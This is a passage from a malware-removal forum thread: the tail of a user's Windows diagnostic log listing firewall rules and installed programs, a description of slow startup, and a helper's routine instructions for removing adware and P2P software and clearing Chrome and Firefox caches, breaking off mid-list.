"UDP Query User{6B0CB342-C1C7-4DA2-A48E-5762D772A846}C:\program files (x86)\ncwest\nclauncher\ncupdatehelper.exe" = protocol=17 | dir=in | app=c:\program files (x86)\ncwest\nclauncher\ncupdatehelper.exe |
"UDP Query User{6CD51022-9AA6-4843-8B6D-2026349CADB4}C:\users\wesley\desktop\clutter\new folder\patch_server.exe" = protocol=17 | dir=in | app=c:\users\wesley\desktop\clutter\new folder\patch_server.exe |
"UDP Query User{6CFA2A4B-5553-4DE6-90A2-A49F23079B4B}C:\users\wesley\desktop\psoserver\psologin_ship_server\patch_server.exe" = protocol=17 | dir=in | app=c:\users\wesley\desktop\psoserver\psologin_ship_server\patch_server.exe |
"UDP Query User{B5B82CB3-5B5C-43F8-8E98-12A92A31B1D1}C:\program files (x86)\ncwest\nclauncher\ncupdatehelper.exe" = protocol=17 | dir=in | app=c:\program files (x86)\ncwest\nclauncher\ncupdatehelper.exe |
"UDP Query User{BE607925-3EBA-4E94-AD67-3A19221D9E70}C:\users\wesley\desktop\clutter\new folder\login_server.exe" = protocol=17 | dir=in | app=c:\users\wesley\desktop\clutter\new folder\login_server.exe |
"UDP Query User{BFF7D5D3-4871-4ED9-91A8-423B5566FAC9}C:\users\wesley\desktop\new folder\patch_server.exe" = protocol=17 | dir=in | app=c:\users\wesley\desktop\new folder\patch_server.exe |
"UDP Query User{C73F262E-F4CF-4089-A4D6-215DFA7ABCA3}C:\program files (x86)\premiumsoft\navicat lite\navicat.exe" = protocol=17 | dir=in | app=c:\program files (x86)\premiumsoft\navicat lite\navicat.exe |
"UDP Query User{C77B42BD-A303-46EC-B15D-BEF116307CD3}C:\program files (x86)\steam\steamapps\common\dragon age ultimate edition\bin_ship\daorigins.exe" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\dragon age ultimate edition\bin_ship\daorigins.exe |
"UDP Query User{D2C64A5C-E6FE-4C1F-A72E-E9FD435CF421}C:\program files (x86)\aim\aim.exe" = protocol=17 | dir=in | app=c:\program files (x86)\aim\aim.exe |
"UDP Query User{DCFA11DC-9892-4FEB-B76B-0FC88DFDB566}C:\users\wesley\desktop\new folder\ship_server.exe" = protocol=17 | dir=in | app=c:\users\wesley\desktop\new folder\ship_server.exe |
"UDP Query User{DD17F066-AFFB-4B06-8AF0-B28AD22AED45}C:\users\wesley\desktop\new folder\login_server.exe" = protocol=17 | dir=in | app=c:\users\wesley\desktop\new folder\login_server.exe |
"UDP Query User{F6BDF47E-F81B-467C-8710-FC6A32239A25}C:\users\wesley\desktop\new folder\spsos_login_v.048_nosql\login_server.exe" = protocol=17 | dir=in | app=c:\users\wesley\desktop\new folder\spsos_login_v.048_nosql\login_server.exe |
"UDP Query User{F85281CB-1CDD-427A-BA5D-30E1B6B277A2}C:\program files (x86)\steam\steamapps\common\skyrim\creationkit.exe" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\skyrim\creationkit.exe |
"UDP Query User{F96690B8-9E71-4085-ADD7-FDD2D05E9075}C:\program files (x86)\safari\phone\skype.exe" = protocol=17 | dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{027E5FAB-1476-4C59-AAB4-32EF28520399}" = Windows Live Language Selector
"{0826F9E4-787E-481D-83E0-BC6A57B056D5}" = Microsoft SQL Server VSS Writer
"{1ACC8FFB-9D84-4C05-A4DE-D28A9BC91698}" = Windows Live ID Sign-in Assistant
"{1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1}" = Microsoft .NET Framework 4.5
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
"{23170F69-40C1-2702-0920-000001000000}" = 7-Zip 9.20 (x64 edition)
"{2EF5D87E-B7BD-458F-8428-E4D0B8B4E65C}" = Apple Mobile Device Support
"{2F14965D-567B-4E59-ADEB-0A2CC1E3ADDF}" = Sql Server Customer Experience Improvement Program
"{350AA351-21FA-3270-8B7A-835434E766AD}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022
"{3C5E60F1-0821-4B07-97EA-84EB5A927CF6}" = MobileMe Control Panel
"{3DDACE1F-3B1E-D6AB-CD3D-B6E987511945}" = ATI Catalyst Install Manager
"{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148
"{503640E5-B2ED-3173-D109-D4D03153471A}" = AMD Drag and Drop Transcoding
"{5340A3B5-3853-4745-BED2-DD9FF5371331}" = Microsoft SQL Server 2008 Common Files
"{579584AA-7CBA-46DF-A434-34988C76A65C}" = MagniPic
"{5CA882E6-4BF0-4E55-B290-6C4EAD6E586E}" = MySQL Server 5.5
"{5DE154DF-A55E-4FA5-BE59-32E78FCACF3E}" = Microsoft Windows SDK for Visual Studio 2008 Headers and Libraries
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}" = Bonjour
"{71EFF430-1A34-423E-8EAF-A80173960A8E}" = TortoiseSVN 1.7.10.23359 (64 bit)
"{723C8298-C7B0-0409-A1B6-C3BA6F3FFAB1}" = Autodesk 3ds Max 2012 64-bit - English
"{7ABFE47E-004E-49A2-AB49-486CA15CC688}" =
"{7ACE202B-1B01-4B43-B6AE-03D66D621CDE}" = Microsoft SQL Server 2008 RsFx Driver
"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
"{893F27E6-D6BE-4B9F-80E6-0ADA694A31A8}" = Microsoft SQL Server 2008 Common Files
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8DF73A13-F54C-4CB3-B4AD-4375A2E8F4F8}" = VmciSockets
"{90140000-006D-0409-1000-0000000FF1CE}" = Microsoft Office Click-to-Run 2010
"{90A80D89-A0E4-33C1-B13D-B93CB3496867}" = Microsoft Visual Studio 2008 Remote Debugger Light (x64) - ENU
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5
"{95120000-00B9-0409-1000-0000000FF1CE}" = Microsoft Application Error Reporting
"{A7E19604-93AF-4611-8C9F-CE509C2B286E}_is1" = VDownloader 3.9.1326
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision" = NVIDIA 3D Vision Driver 266.44
"{B2FE1952-0186-46c3-BAEC-A80AA35AC5B8}_Display.ControlPanel" = NVIDIA Display Control Panel
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver" = NVIDIA Graphics Driver 266.44
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX" = NVIDIA PhysX System Software 9.10.0514
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver" = NVIDIA HD Audio Driver 1.1.13.1
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_installer" = NVIDIA Install Application
"{CC8BA866-16A7-4667-BA0C-C494A1E7B2BF}" = Microsoft SQL Server 2008 Database Engine Shared
"{D601CEAD-2E4F-4BBB-85CC-C29A4CE6A3C0}" = iTunes
"{D9C50188-12D5-4D3E-8F00-682346C2AA5F}" = Microsoft Xbox 360 Accessories 1.2
"{DA54F80E-261C-41A2-A855-549A144F2F59}" = Windows Live MIME IFilter
"{DE35700E-4D3C-41A5-8BF0-44A5FDE4A6C5}" = MySQL Server 5.1
"{DF167CE3-60E7-44EA-99EC-2507C51F37AE}" = Microsoft SQL Server 2008 Database Engine Shared
"{DFB3AD2B-4EE2-3077-BF1D-3CA164BC5336}" = Microsoft Windows SDK for Visual Studio 2008 SP1 Express Tools for .NET Framework - enu
"{EA234BC3-39FE-4734-B72F-076086889F6D}" = Composite 2012 64-bit
"{EAFB2AD8-D92B-464C-8D97-B9CB94703C4A}" = iCloud
"{EC93BB38-01C9-4D3B-9BA7-B26BDC03E6C1}" = TortoiseGit 1.8.6.0 (64 bit)
"{F5C819A5-E068-4f7d-B91A-1BD18702AFFB}" = Microsoft Windows SDK for Visual Studio 2008 SP1 Express Tools for Win32
"{FA7394B8-CE65-4F9E-AC99-F372AD365424}" = Microsoft SQL Server 2008 Database Engine Services
"{FAE188FD-A941-49E9-A5E9-F6D88517EC40}" = Smart Recovery B09.1002.1  (x64)
"{FBD367D1-642F-47CF-B79B-9BE48FB34007}" = Microsoft SQL Server 2008 Database Engine Services
"{FCADA26A-5672-31DD-BF0E-BA76ECF9B02D}" = Microsoft Help Viewer 1.0
"{FD53298A-4734-AFCB-B733-4C07776E589E}" = ccc-utility64
"6af12c54-643b-4752-87d0-8335503010de_is1" = Nexus Mod Manager
"Autodesk 3ds Max 2012 64-bit - English" = Autodesk 3ds Max 2012 64-bit - English
"Autodesk FBX Plug-in 2012.0 - 3ds Max 2012 64-bit" = Autodesk FBX Plug-in 2012.0 - 3ds Max 2012 64-bit
"CCleaner" = CCleaner
"GIMP-2_is1" = GIMP 2.8.4
"MagniPic" =
"Microsoft Help Viewer 1.0" = Microsoft Help Viewer 1.0
"Microsoft Visual Studio 2008 Remote Debugger Light (x64) - ENU" = Microsoft Visual Studio 2008 Remote Debugger Light (x64) - ENU
"NIF Utilities for 3ds Max_is1" = NIF Utilities 3.7.3.265452180 for 3ds Max
"Sublime Text 2_is1" = Sublime Text 2.0.2
"Sublime Text 3_is1" = Sublime Text Build 3047
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{014A2868-BE56-4888-A16C-693989B8F153}" = SlimDX Runtime .NET 2.0 (January 2012)
"{048298C9-A4D3-490B-9FF9-AB023A9238F3}" = Steam
"{04AF207D-9A77-465A-8B76-991F6AB66245}" = Adobe Help Viewer CS3
"{07300F01-89CA-4CF8-92BD-2A605EB83C95}" = EasySaver B9.1214.1
"{08B32819-6EEF-4057-AEDA-5AB681A36A23}" = Adobe Bridge Start Meeting
"{0B0F231F-CE6A-483D-AA23-77B364F75917}" = Windows Live Installer
"{0E532C84-4275-41B3-9D81-D4A1A20D8EE7}" = PlayStation®Store
"{11083C7A-D0D6-4DA4-8C3A-74B8389EC07B}" = ATI Catalyst Registration
"{1111706F-666A-4037-7777-210328764D10}" = JavaFX 2.1.0
"{167A1F6A-9BF2-4B24-83DB-C6D659F680EA}" = Media Go
"{179C91E9-D9ED-D5CC-F0D8-9579DBDED8D6}" = CCC Help English
"{184CE391-7E0E-4C63-9935-D7A10EDFD3C6}" = Adobe WinSoft Linguistics Plugin
"{19BA08F7-C728-469C-8A35-BFBD3633BE08}" = Windows Live Movie Maker
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}" = Junk Mail filter update
"{200FEC62-3C34-4D60-9CE8-EC372E01C08F}" = Windows Live SOXE Definitions
"{20B6BE33-525B-4EF9-9628-E1BA58093A4C}" = ZBrush 4R2
"{2205B8AE-490E-43F2-AB43-C13C2BEC86A7}" = DDS Thumbnail Viewer
"{23170F69-40C1-2701-0921-000001000000}" = 7-Zip 9.21
"{23664DA8-8872-4CF4-A2F2-327CC539823B}" = Lineage II
"{23D683DD-93C6-48E6-B84E-78B57778F126}" = Oblivion - Construction Set
"{23F79416-CAD1-41BF-99A3-040F6C814AAA}" = NVIDIA Photoshop Plug-ins
"{25F259ED-12F6-429F-5783-527C3E2F8586}" = DeAlEoxipRRESs
"{26A24AE4-039D-4CA4-87B4-2F83216034FF}" = Java™ 6 Update 34
"{26A24AE4-039D-4CA4-87B4-2F83217006FF}" = Java 7 Update 6
"{284CFEE9-720C-43C6-A276-1945CA4F6DDF}_is1" = Aion RainMeter version 1.51
"{29E5EA97-5F74-4A57-B8B2-D4F169117183}" = Adobe Stock Photos CS3
"{2A3FC24C-6EC0-4519-A52B-FDA4EA9B2D24}" = Windows Live Messenger
"{2B41E132-07DF-4925-A3D3-F2D1765CCDFE}" = FINAL FANTASY XIV - A Realm Reborn
"{32A3A4F4-B792-11D6-A78A-00B0D0160340}" = Java™ SE Development Kit 6 Update 34
"{3336F667-9049-4D46-98B6-4C743EEBC5B1}" = Windows Live Photo Gallery
"{342D4AD7-EC4C-4EC8-AEA6-E70F5905A490}" = SQL Server System CLR Types
"{34EF7358-ABC7-8469-5FB6-C5C0146F099E}" = Media Go Video Playback Engine 1.84.102.07010
"{34F4D9A4-42C2-4348-BEF4-E553C84549E7}" = Windows Live Photo Gallery
"{35CB6715-41F8-4F99-8881-6FC75BF054B0}" = Oblivion
"{3C3D696B-0DB7-3C6D-A356-3DB8CE541918}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729
"{3D347E6D-5A03-4342-B5BA-6A771885F379}" = Autodesk Backburner 2012.0.0
"{3D7E3EC9-46CF-4359-9289-39CE01DFB82F}" = Adobe Photoshop CS3
"{46F044A5-CE8B-4196-984E-5BD6525E361D}" = Apple Application Support
"{46F8CF66-AB83-38A7-99B2-A5BE507EE472}" = Microsoft Visual C++ 2010 Express - ENU
"{4723F199-FA64-4233-8E6E-9FCCC95A18EE}" = Python 2.6.5
"{478472F9-9E09-492A-BDAB-42EE595EF1AD}" = FuanDEals
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4C646DF7-1E7F-44D0-ADF0-CCCE44C92CF4}" = MySQL Installer
"{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}" = Skype™ 6.1
"{51846830-E7B2-4218-8968-B77F0FF475B8}" = Adobe Color EU Extra Settings
"{5449FB4F-1802-4D5B-A6D8-087DB1142147}" = Realtek HDMI Audio Driver for ATI
"{54793AA1-5001-42F4-ABB6-C364617C6078}" = Adobe Linguistics CS3
"{579684A4-DDD5-4CA3-9EA8-7BE7D9593DB4}" = Windows Live UX Platform Language Pack
"{5A13987D-55F4-4271-A40E-76AC9B1B38FD}" = OpenOffice.org 3.2
"{5B363E1D-8C36-4458-BAE4-D5081999E094}" = Browser Configuration Utility
"{5F189DF5-2D05-472B-9091-84D9848AE48B}{976137e5}" = WebPlat
"{5F8E2CBB-949D-4175-AC98-5ADE7F6C9697}" = NCsoft Launcher
"{6151cf20-0bd8-4023-a4a0-6a86dcfe58e5}" = Python 2.6.6
"{65420DC9-306E-4371-905F-F4DC3B418E52}" = Autodesk Material Library Base Resolution Image Library 2012
"{682B3E4F-696A-42DE-A41C-4C07EA1678B4}" = Windows Live SOXE
"{6ABE0BEE-D572-4FE8-B434-9E72A289431B}" = Adobe Fonts All
"{6C8B53B9-41EE-AD83-007A-55EE64DE6932}" = Catalyst Control Center Graphics Previews Common
"{6FF5DD7A-FE28-4439-B8CF-1E9AF4EA0A61}" = Adobe Asset Services CS3
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{735619D4-B42A-437A-958C-199BFCAEDB38}" = Safari
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{7BE15435-2D3E-4B58-867F-9C75BED0208C}" = QuickTime
"{802771A9-A856-4A41-ACF7-1450E523C923}" = Adobe XMP Panels CS3
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{83C292B7-38A5-440B-A731-07070E81A64F}" = Windows Live PIMT Platform
"{84AEB93A-ECBB-4568-8F59-D4516EF59079}" = Skyrim Performance Monitor
"{8833FFB6-5B0C-4764-81AA-06DFEED9A476}" = Realtek Ethernet Controller Driver For Windows Vista and Later
"{8ACC73AA-6511-7C55-B1A9-8E5D1DEAFAA3}" = The Lord of the Rings FREE Trial
"{8D2BA474-F406-4710-9AE4-D4F22D21F0DD}" = Adobe Device Central CS3
"{8DD46C6A-0056-4FEC-B70A-28BB16A1F11F}" = MSVCRT
"{8E6808E2-613D-4FCD-81A2-6C8FA8E03312}" = Adobe Type Support
"{8EA79DBF-D637-448A-89D6-410A087A4493}" = Samsung_MonSetup
"{8F0837C2-EE09-4903-88F3-1976FE7FFF4E}" = Autodesk Material Library 2012
"{90140011-0066-0409-0000-0000000FF1CE}" = Microsoft Office Starter 2010 - English
"{90176341-0A8B-4CCC-A78D-F862228A6B95}" = Adobe Anchor Service CS3
"{92EA4134-10D1-418A-91E1-5A0453131A38}" = Windows Live Movie Maker
"{95120000-00B9-0409-0000-0000000FF1CE}" = Microsoft Application Error Reporting
"{95140000-0070-0000-0000-0000000FF1CE}" = Microsoft Office 2010
"{95655ED4-7CA5-46DF-907F-7144877A32E5}" = Adobe Color NA Recommended Settings
"{980A182F-E0A2-4A40-94C1-AE0C1235902E}" = Pando Media Booster
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{9C9824D9-9000-4373-A6A5-D0E5D4831394}" = Adobe Bridge CS3
"{9D56775A-93F3-44A3-8092-840E3826DE30}" = Windows Live Mail
"{A2B242BD-FF8D-4840-9DAA-9170EABEC59C}" = Adobe CMaps
"{A2D81E70-2A98-4A08-A628-94388B063C5E}" = Adobe Color - Photoshop Specific
"{A726AE06-AAA3-43D1-87E3-70F510314F04}" = Windows Live Writer
"{A9BDCA6B-3653-467B-AC83-94367DA3BFE3}" = Windows Live Photo Common
"{AAAFC670-569B-4A2F-82B4-42945E0DE3EF}" = Windows Live Writer
"{AAF454FC-82CA-4F29-AB31-6A109485E76E}" = Windows Live Writer
"{AC5B0C19-D851-42F4-BDA0-410ECF7F70A5}" = PDF Settings
"{AC76BA86-7AD7-1033-7B44-AA1000000001}" = Adobe Reader X (10.1.4)
"{AFF7E080-1974-45BF-9310-10DE1A1F5ED0}" = Adobe AIR
"{B10914FD-8812-47A4-85A1-50FCDE7F1F33}" = Windows Live Sync
"{B3BF6689-A81D-40D8-9A86-4AC4ACD9FC1C}" = Adobe Camera Raw 4.0
"{B5751715-EC10-43D9-8C95-62E1368433EF}" = Autodesk Material Library Medium Resolution Image Library 2012
"{B6659DD8-00A7-4A24-BBFB-C1F6982E5D66}" = PlayStation®Network Downloader
"{B9B35331-B7E4-4E5C-BF4C-7BC87856124D}" = Adobe Default Language CS3
"{B9DB4C76-01A4-46D5-8910-F7AA6376DBAF}" = NVIDIA PhysX
"{C2D69781-F392-4118-A5A7-C7E9C38DBFC2}" = Adobe ExtendScript Toolkit 2
"{C66824E4-CBB3-4851-BB3F-E8CFD6350923}" = Windows Live Mail
"{CAAF899F-D15F-480F-AF10-22B1431A5E9F}" = AX88772
"{CD95F661-A5C4-44F5-A6AA-ECDD91C240C0}" = WinZip 15.0
"{CE95A79E-E4FC-4FFF-8A75-29F04B942FF2}" = Windows Live UX Platform
"{CED8E25B-122A-4E80-B612-7F99B93284B3}" = Arc
"{CF5DE1DD-F7E6-694D-1E82-84C7C9C9ABDB}" = Catalyst Control Center Graphics Previews Vista
"{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}" = Microsoft .NET Framework 4 Multi-Targeting Pack
"{D0B44725-3666-492D-BEF6-587A14BD9BD9}" = MSVCRT_amd64
"{D0DFF92A-492E-4C40-B862-A74A173C25C5}" = Adobe Version Cue CS3 Client
"{D102611A-6466-4101-A51D-51069303AC65}" = tools-linux
"{D2559B88-CC9D-4B48-81BB-F492BAA9C48C}" = Adobe PDF Library Files
"{D2883AB6-09B4-4981-AAF8-E695411EEC9A}" = Sculptris Alpha 6
"{D436F577-1695-4D2F-8B44-AC76C99E0002}" = Windows Live Photo Common
"{D45240D3-B6B3-4FF9-B243-54ECE3E10066}" = Windows Live Communications Platform
"{D7BF9739-8A68-4335-BBEE-37752AD9E86B}" = NEC Electronics USB 3.0 Host Controller Driver
"{D8087907-E255-3A41-A46D-D0F798709C71}" = Microsoft Visual C++ 2008 Express Edition with SP1 - ENU
"{D8A50F0B-791E-43E6-8F22-AEC2D3FBEB84}" = PingPlotter Standard 3.40.2s
"{D8D06241-617C-42AB-B9C7-D9BA5A377D10}" = NVIDIA Texture Tools 2
"{DADD7B8A-BCB0-44F5-967A-ECB6B4F2ECD9}" = Adobe Color Common Settings
"{DD7DB3C5-6FA3-4FA3-8A71-C2F2940EB029}" = Adobe Color JA Extra Settings
"{DDA34038-89BD-4804-B0B8-DC48D5DFB463}" = Catalyst Control Center - Branding
"{DDC8BDEE-DCAC-404D-8257-3E8D4B782467}" = Windows Live Writer Resources
"{E09C4DB7-630C-4F06-A631-8EA7239923AF}" = D3DX10
"{E452E727-86B8-4233-8CC3-41FD817AFAFF}" = VMware Player
"{E5B21F11-6933-4E0B-A25C-7963E3C07D11}" = Windows Live Messenger
"{E69AE897-9E0B-485C-8552-7841F48D42D8}" = Adobe Update Manager CS3
"{EE6D92CD-F750-4BB3-B3EA-3B392748D19D}" = Aion
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{F2C4E6E0-EB78-4824-A212-6DF6AF0E8E82}" = FINAL FANTASY XIV
"{F5E87B12-3C27-452F-8E78-21D42164FD83}" = Microsoft SQL Server 2008 Management Objects
"{F71E7762-8A64-AECC-0917-DA51677041CF}" = Catalyst Control Center InstallProxy
"{F843C6A3-224D-4615-94F8-3C461BD9AEA0}" = Jasc Paint Shop Pro 9
"{F9D65BA1-84C5-B4CB-91FE-D68F07ECBA24}" = ccc-core-static
"{FE044230-9CA5-43F7-9B58-5AC5A28A1F33}" = Windows Live Essentials
"{FF11004C-F42A-4A31-9BCF-7F5C8FDBE53C}" = Adobe Setup
"{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
"Adobe AIR" = Adobe AIR
"Adobe Flash Player ActiveX" = Adobe Flash Player 11 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 11 Plugin
"Adobe_719d6f144d0c086a0dfa7ff76bb9ac1" = Adobe Photoshop CS3
"Avidemux 2.6" = Avidemux 2.6 (32-bit)
"Blender" = Blender (remove only)
"BlenderNIFScripts" = Blender NIF Scripts (remove only)
"BOSS" = BOSS
"Cheat Engine 6.2_is1" = Cheat Engine 6.2
"comtypes-py2.6" = Python 2.6 comtypes-0.6.2
"ControlMK" = ControlMK 0.232
"DealCabby" = DealCabby
"ESET Online Scanner" = ESET Online Scanner v3
"ExpressRip" = Express Rip
"FileZilla Client" = FileZilla Client 3.6.0.2
"FlashDevelop" = FlashDevelop 4.5.2
"Fraps" = Fraps (remove only)
"Frhed" = Frhed 1.7.1
"Generic Mod Manager_is1" = Fallout Mod Manager 0.13.21
"Git_is1" = Git version 1.8.4-preview20130916
"InstallShield_{20B6BE33-525B-4EF9-9628-E1BA58093A4C}" = ZBrush 4R2
"InstallShield_{D2883AB6-09B4-4981-AAF8-E695411EEC9A}" = Sculptris Alpha 6
"InstallShield_{D7BF9739-8A68-4335-BBEE-37752AD9E86B}" = NEC Electronics USB 3.0 Host Controller Driver
"InstallShield_{FAE188FD-A941-49E9-A5E9-F6D88517EC40}" = Smart Recovery B09.1002.1  (x64)
"KeePass Password Safe_is1" = KeePass Password Safe 1.25
"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware version 1.75.0.1300
"Microsoft Visual C++ 2008 Express Edition with SP1 - ENU" = Microsoft Visual C++ 2008 Express Edition with SP1 - ENU
"Microsoft Visual C++ 2010 Express - ENU" = Microsoft Visual C++ 2010 Express - ENU
"mIRC" = mIRC
"Mozilla Firefox 26.0 (x86 en-US)" = Mozilla Firefox 26.0 (x86 en-US)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"MSNINST" = MSN
"NCLauncher_NCWest" = NCSOFT Game Launcher
"NifSkope" = NifSkope (remove only)
"Notepad++" = Notepad++
"NVIDIAStereo" = NVIDIA Stereoscopic 3D Driver
"Oblivion mod manager_is1" = Oblivion mod manager 1.1.12
"Office14.Click2Run" = Microsoft Office Click-to-Run 2010
"Ogg Converter" = Ogg Converter
"OpenAL" = OpenAL
"PHANTASY STAR UNIVERSE Ambition of the Illuminus_is1" = PHANTASY STAR UNIVERSE Ambition of the Illuminus
"PremiumSoft Navicat Lite_is1" = PremiumSoft Navicat Lite 10.0
"Prism" = Prism Video File Converter
"privitize" =  toolbar  on IE and Chrome
"PyFFI" = PyFFI 2.1.11
"PyFFI-py2.6" = Python 2.6 PyFFI-2.1.11
"pywin32-py2.6" = Python 2.6 pywin32-216
"Raptureres" = Rapture Resource Manager
"Shockwave" = Shockwave
"SpeedFan" = SpeedFan (remove only)
"Star Trek Online" = Star Trek Online
"Steam App 202480" = Creation Kit
"Steam App 206420" = Saints Row IV
"Steam App 22320" = The Elder Scrolls III: Morrowind
"Steam App 22330" = The Elder Scrolls IV: Oblivion
"Steam App 242590" = Saints Row IV Inauguration Station
"Steam App 39140" = FINAL FANTASY VII
"Steam App 47810" = Dragon Age: Origins - Ultimate Edition
"Steam App 72850" = The Elder Scrolls V: Skyrim
"TechPowerUp GPU-Z" = TechPowerUp GPU-Z
"uTorrent" = µTorrent
"VMware_Player" = VMware Player
"WavePad" = WavePad Sound Editor
"WinLiveSuite" = Windows Live Essentials
"WinPcapInst" = WinPcap 4.1.1
"WinRAR archiver" = WinRAR archiver
"winscp3_is1" = WinSCP 5.1.4
"Wrye Bash" = Wrye Bash
"Wubi" = Ubuntu
"wxPython2.8-ansi-py26_is1" = wxPython 2.8.11.0 (ansi) for Python 2.6
"Yahoo! Companion" = Yahoo! Toolbar
"Yahoo! Messenger" = Yahoo! Messenger
"Yahoo! Software Update" = Yahoo! Software Update
 
========== HKEY_CURRENT_USER Uninstall List ==========
 
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"NCsoft-AionEU" = Aion
"uTorrent" = µTorrent
"WinDirStat" = WinDirStat 1.1.2
 
< End of report >

 

Symptoms..

 

How to can I put this.

 

My system is "queing" if that makes any sense. FireFox is the first thing I want to load when I turn on my computer, but it'll set there at my desktop screen for 3-4minutes before loading fire fox. And when fire fox finally loads, it freezes a lot before 'normalizing'. Generally anything that requires loading up takes a long time. If I wanna view an image, there's lag with that too.



#6 OCD

OCD

    SuperHelper

  • Malware Team
  • 5,574 posts

Posted 03 January 2014 - 09:42 PM

Hi Midnight Sky,

bullseye_zpse9eaf36e.gif P2P - (Peer to Peer)

I see you have/had P2P software uTorrent installed on your machine. We are not here to pass judgment on file-sharing as a concept. However, we will warn you that engaging in this activity and having this kind of software installed on your machine will always make you more susceptible to re-infections and possibly Identity Theft. It likely contributed to your current situation. This page will give you further information.

Please note: Even if you are using a "safe" P2P program, it is only the program that is safe. You will be sharing files from uncertified sources, and these are often infected. The bad guys use P2P filesharing as a major conduit to spread their wares.

I would strongly recommend that you uninstall this now.

Click Start > Control Panel > Programs and Features. Locate and select the following that are present on the list and click the Remove button:
  • uTorrent
If you choose to not remove this programs please refrain from using it until we have finished cleaning your computer.

=========================

Also in the Control Panel > Programs & Features

=========================

bullseye_zpse9eaf36e.gif Uninstall via Programs and Features

Click Start > Control Panel > Programs and Features. Locate and select the following that are present on the list and click the Remove button:
  • DealCabby
  • privitize
=========================

bullseye_zpse9eaf36e.gif Reset / Change Homepage in Chrome
  • Click the Chrome menu chromebrowsertoolbar.png on the browser toolbar.
  • Select Settings.
    • Add the home button to the browser toolbar
      Home page button is off by default. Select the "Show Home button" checkbox in the "Appearance" section to show it on the browser toolbar.
    • Set your home page
      When the "Show Home button" checkbox is selected, a web address appears below it. This is the address you will want to change. (hxxp:searchou.com/)
      Click Change to enter a link (i.e. http://www.google.com). You can also choose the New Tab page as your home page.
=========================

bullseye_zpse9eaf36e.gif Set your default search engine in Chrome
  • Click the Chrome menu chromebrowsertoolbar.png on the browser toolbar.
  • Select Settings
  • In the "Search" section, select the search engine you want to use from the menu. If the search engine you want to use doesn't appear in the menu, click Manage search engines.
  • In the Search Engines dialog that appears, select the search engine that you'd like to use from the list.
  • Click the Make Default button that appears in the row.
If the search engine you want to use isn't on this list, you can first add it as a new search engine option.

If the "Make Default" button doesn't appear for the search engine you've selected, you may need to edit its URL.

=========================

bullseye_zpse9eaf36e.gif Delete cache and other browser data in Chrome
  • Click the Chrome menu chromebrowsertoolbar.png on the browser toolbar.
  • Select Tools.
  • Select Clear browsing data.
  • In the dialogue that appears, select the highlighted check-boxes for the types of information that you want to remove.
    • Clear browsing history
    • Clear download history
    • Empty the cache
    • Delete cookies and other site and plug-in data
    • Clear saved passwords
    • Clear saved Autofill form data
    • Clear data from hosted apps
    • Deauthorize content licenses
  • Use the menu at the top to select the amount of data that you want to delete. Select beginning of time to delete everything.
  • Click Clear browsing data.
=========================

bullseye_zpse9eaf36e.gif Flush the FireFox Cache
(these directions are specific to Firefox 19, if you have a different version the exact steps might be slightly different)
  • In Firefox, Options
  • Select Options
  • Select Privacy tab
  • Find the section that reads: You might want to clear your recent history or remove individual cookies
  • Select clear your recent history
  • Click the Details drop-down arrow
  • Make sure a check mark is placed in the following boxes:
